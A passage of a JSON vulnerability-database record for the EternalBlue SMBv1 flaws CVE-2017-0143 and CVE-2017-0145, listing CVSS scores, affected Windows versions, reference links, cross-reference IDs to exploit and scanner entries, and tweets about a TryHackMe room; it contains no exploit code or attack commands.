"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-10-04T12:18:44", "value": 9.2, "vector": "NONE"}}, "hash": "6a944a3f49b5b4b16ff9c7a7ae2facbf58966ec453a2c22a887b2d743c47f025", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "73402198f736fb284b47cab17ac32650", "key": "description"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "1b0a551fb9c586414474d37717dc313a", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d5aff40f603b053304da7a131c0db8c3", "key": "references"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "f11fa97bbd952a3146ffbddd59276c1d", "key": "title"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0143", "id": "CVE-2017-0143", "lastseen": "2019-10-04T12:18:44", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96703", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0143", "type": "cve", "viewCount": 47}, "differentElements": ["references"], "edition": 2, "lastseen": "2019-10-04T12:18:44"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "dd4a1fba31e29c6988f563bdeb65c80c"}, {"key": "affectedSoftware", "hash": "e758f8fa39ce9e8de2ffe527ec8b6423"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a173072793578541ea04b7baa0323592"}, {"key": "cpe23", "hash": "0751f4e56f29adf827144e01a128331d"}, {"key": "cpeConfiguration", "hash": "6ac681e59932d7c840205e984b11bad5"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "cwe", "hash": "226da5129ffaaee3d5b48e506b957d58"}, {"key": "description", "hash": "73402198f736fb284b47cab17ac32650"}, {"key": "extraReferences", "hash": "d62415554465cb42c2ec8c5b1a727c7d"}, {"key": "href", "hash": "1b0a551fb9c586414474d37717dc313a"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d68798550042e5272198c20ea65d8f01"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "2f4290596ecc563b65873431415d8e8a"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "f11fa97bbd952a3146ffbddd59276c1d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "922787259791f31412399d00be0fe2f7866a6f4bdd42a89940cb3aa92ee2c004", "viewCount": 314, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-04-23T00:07:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}], "modified": "2021-04-23T00:07:42"}, "score": {"value": 9.2, "vector": "NONE", "modified": "2021-04-23T00:07:42", "rev": 2}, "twitter": {"counter": 89, "tweets": [{"link": "https://twitter.com/QuentinCasares/status/1422521751523762177", "text": "Blue - I have just completed this room! Check it out: https://t.co/0l0HtT6bML?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/shadow44406573/status/1423260611429998593", "text": "Blue - I have just completed this room! Check it out: https://t.co/sijYaXhkoQ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/top_wizard/status/1423289010630270995", "text": "Blue - I have just completed this room! Check it out: https://t.co/1ICOkz0X0h?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/VulmonFeeds/status/1425347343709257728", "text": "CVE-2017-0143\n\nThe SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; ...\n\nhttps://t.co/qJj60LUVMn?amp=1"}, {"link": "https://twitter.com/InfoSec_MBE/status/1425558031790657546", "text": "Blue - I have just completed this room! Check it out: https://t.co/Tms9b4JF84?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/uk_NJx/status/1426573521308762112", "text": "Blue - I have just completed this room! Check it out: https://t.co/B1WGZBexHA?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/carlos_o_m/status/1426612611009892352", "text": "Blue - I have just completed this room! Check it out: https://t.co/6jaCHwnUja?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click a trav\u00e9s de /RealTryHackMe"}, {"link": "https://twitter.com/AynRandSucks/status/1429439489068306434", "text": "Blue - I have just completed this room! Check it out: https://t.co/Ypt3f3Ra8A?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/cts_technology/status/1429414666082607108", "text": "Finally!\nBlue - I have just completed this room! Check it out: https://t.co/hJYxVXD4we?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0x6d61/status/1430147082573074436", "text": "Blue - I have just completed this room! Check it out: https://t.co/08xRz1yFx7?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}], "modified": "2021-04-23T00:07:42"}}, "objectVersion": "1.5", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "43970", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/43970/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "96703", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96703"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "immutableFields": []}, {"id": "CVE-2017-0145", "bulletinFamily": "NVD", "title": "CVE-2017-0145", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.", "published": "2017-03-17T00:59:00", "modified": "2018-06-21T01:29:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0145", "reporter": "secure@microsoft.com", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96705", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0145"], "type": "cve", "lastseen": "2021-04-23T00:07:42", "history": [{"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 